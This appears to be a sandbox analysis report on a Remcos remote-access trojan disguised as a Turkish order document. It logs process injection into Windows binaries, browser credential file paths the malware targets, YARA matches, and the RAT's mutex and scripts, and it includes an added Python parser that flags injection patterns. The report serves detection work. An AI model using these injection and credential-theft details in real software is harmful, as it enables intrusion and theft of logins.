Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 980000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 990000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 10540000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 5F0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 880000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: C50000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 800000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 810000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 820000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 830000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 840000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 850000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 860000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 870000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 10540000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 1000000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 1010000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 4BA0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 3060000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 3070000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 3080000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 3090000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 30A0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 30B0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 30C0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 30D0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 10540000 value starts with: 4D5A Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 10540000 value starts with: 4D5A Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 10540000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040F219 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 3_2_0040F219
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 940000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: C00000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 970000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 990000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 5F0000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 810000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 850000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 870000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 1000000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 3070000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 30B0000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 30D0000 Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Code function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, \svchost.exe 3_2_0040A5F5
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00410145 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,StrToIntA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,mouse_event,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 3_2_00410145
Source: logagent.exe, 00000003.00000002.533920731.00000000031F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: logagent.exe, 00000003.00000002.533920731.00000000031F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager3|
Source: logagent.exe, 00000003.00000002.533920731.00000000031F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr|
Source: logagent.exe, 00000003.00000002.533920731.00000000031F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager
Source: logagent.exe, 00000003.00000002.533920731.00000000031F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program ManagerJS;.
Source: logagent.exe, 00000003.00000002.533920731.00000000031F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: C:\Windows\SysWOW64\logagent.exe Code function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z, 3_2_00409E7D
Source: C:\Windows\SysWOW64\logagent.exe Code function: GetLocaleInfoA, 3_2_1054B80C
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_004124A0 cpuid 3_2_004124A0
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00402580 GetLocalTime,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,printf,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,CreateThread, 3_2_00402580
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00412163 GetUserNameW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 3_2_00412163
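The Memory allocated, Memory written and Thread created entries in this section are the raw record of the injection. The sample allocates regions with page execute and read and write protection in the logagent.exe it has just created, Eluiezilfw.exe under C:\Users\Public\Libraries does the same in logagent.exe and DpiScaling.exe, each injector writes into those regions, writes a buffer beginning with 4D5A ("MZ", so a complete PE image rather than a shellcode stub) at base 10540000 in every target, and then starts threads whose EIP is one of the bases it wrote. logagent.exe and DpiScaling.exe are Microsoft binaries that ship with Windows, so the process names are not the indicator; the memory operations are. The Process created entries also show the command line naming C:\Windows\System32\logagent.exe while the image path is C:\Windows\SysWOW64\logagent.exe: the injector is 32-bit, so WoW64 file system redirection substitutes the SysWOW64 copy, and a hunt keyed on the command line alone would look for the wrong file. The Python below is an added example and is not part of this report: it reads entries in this format, correlates allocation protection, writes, the MZ magic and thread start addresses per (injector, target) pair, and flags the System32/SysWOW64 discrepancy. Finding names are this example's own; the sample lines are a subset copied verbatim from this section, and target paths are assumed to contain no spaces, as here.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# One behaviour entry as printed in this report. "Jump to behavior" is the report's
# link text and is stripped. Target paths are assumed to contain no spaces.
_EVENT = re.compile(
    r"^Source:\s+(?P<src>.+?)\s+"
    r"(?P<kind>Memory allocated|Memory written|Thread created|Process created):\s+"
    r"(?P<target>\S+)\s*(?P<rest>.*?)(?:\s+Jump to behavior)?\s*$"
)
_BASE = re.compile(r"base:\s+([0-9A-Fa-f]+)")
_EIP = re.compile(r"EIP:\s+([0-9A-Fa-f]+)")
_MAGIC = re.compile(r"value starts with:\s+([0-9A-Fa-f]+)")
_RWX = "page execute and read and write"

PairKey = Tuple[str, str]  # (injecting image, target image)


def _new_region() -> dict:
    return {"rwx": False, "written": False, "mz": False, "thread": False}


def analyze(lines: List[str]) -> Dict[PairKey, dict]:
    """Group allocation/write/thread events per (injector, target) and derive findings."""
    pairs: Dict[PairKey, dict] = {}
    for line in lines:
        m = _EVENT.match(line.strip())
        if not m:
            continue
        state = pairs.setdefault((m["src"], m["target"]),
                                 {"regions": defaultdict(_new_region), "cmdline": None})
        kind, rest = m["kind"], m["rest"]
        if kind == "Process created":
            state["cmdline"] = rest
            continue
        if kind == "Thread created":
            eip = _EIP.search(rest)
            if eip:
                state["regions"][eip.group(1).upper()]["thread"] = True
            continue
        base = _BASE.search(rest)
        if not base:
            continue
        region = state["regions"][base.group(1).upper()]
        if kind == "Memory allocated":
            region["rwx"] = _RWX in rest
        else:                                    # Memory written
            region["written"] = True
            magic = _MAGIC.search(rest)
            if magic and magic.group(1).upper().startswith("4D5A"):   # "MZ" header
                region["mz"] = True
    for key, state in pairs.items():
        state["findings"] = _findings(key, state)
    return pairs


def _findings(key: PairKey, state: dict) -> List[str]:
    _, target = key
    out = []
    for base, r in sorted(state["regions"].items(), key=lambda kv: int(kv[0], 16)):
        if r["thread"] and r["rwx"] and r["written"]:
            out.append(f"thread_in_written_rwx@{base}")   # CreateRemoteThread-style entry
        elif r["thread"]:
            out.append(f"thread_in_unknown_region@{base}")
        if r["mz"]:
            out.append(f"pe_image_written@{base}")        # a whole PE copied into the target
    # A 32-bit process that asks for System32\x.exe gets SysWOW64\x.exe from WoW64
    # file system redirection, so the image path and the command line disagree.
    cmd = state["cmdline"] or ""
    if "\\syswow64\\" in target.lower() and "\\system32\\" in cmd.lower():
        out.append("wow64_redirected_image_path")
    return out


# Sample input: entries copied verbatim from this section of the report.
REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 10540000 protect: page execute and read and write Jump to behavior",
    r"Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 940000 protect: page execute and read and write Jump to behavior",
    r"Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 940000 Jump to behavior",
    r"Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 10540000 Jump to behavior",
    r"Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 10540000 value starts with: 4D5A Jump to behavior",
    r"Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 940000 Jump to behavior",
    r"Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe Jump to behavior",
    r"Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 1000000 protect: page execute and read and write Jump to behavior",
    r"Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 1000000 Jump to behavior",
    r"Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 10540000 value starts with: 4D5A Jump to behavior",
    r"Source: C:\Users\Public\Libraries\Eluiezilfw.exe Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 1000000 Jump to behavior",
]


def run_report() -> Dict[PairKey, dict]:
    return analyze(REPORT_LINES)


if __name__ == "__main__":
    for (src, target), state in run_report().items():
        print(src, "->", target, state["findings"])
```

On a live host the same sequence surfaces as Sysmon Event ID 10 (ProcessAccess) followed by Event ID 8 (CreateRemoteThread, whose StartAddress is the EIP recorded here), and the System32-versus-SysWOW64 check applies to those events unchanged. The numeric sort in `_findings` matters only for stable output; the hex bases are strings in the report and would otherwise sort lexically.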

Stealing of Sensitive Information

Source: Yara match File source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.359362662.0000000004C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.344931678.0000000000D80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.533899763.00000000031F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: logagent.exe PID: 6552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DpiScaling.exe PID: 5936, type: MEMORYSTR
Source: C:\Windows\SysWOW64\logagent.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 3_2_0040728F
Source: C:\Windows\SysWOW64\logagent.exe Code function: \key3.db 3_2_0040728F
Source: C:\Windows\SysWOW64\logagent.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 3_2_0040710F

Remote Access Functionality

Source: Yara match File source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.359362662.0000000004C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.344931678.0000000000D80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.533899763.00000000031F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: logagent.exe PID: 6552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DpiScaling.exe PID: 5936, type: MEMORYSTR
Source: logagent.exe String found in binary or memory: Remcos_Mutex_Inj
Source: logagent.exe, 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: Remcos_Mutex_Inj
Source: logagent.exe, 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.1 Propth_unencoverridev
Source: logagent.exe, 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: Remcos_Mutex_Inj
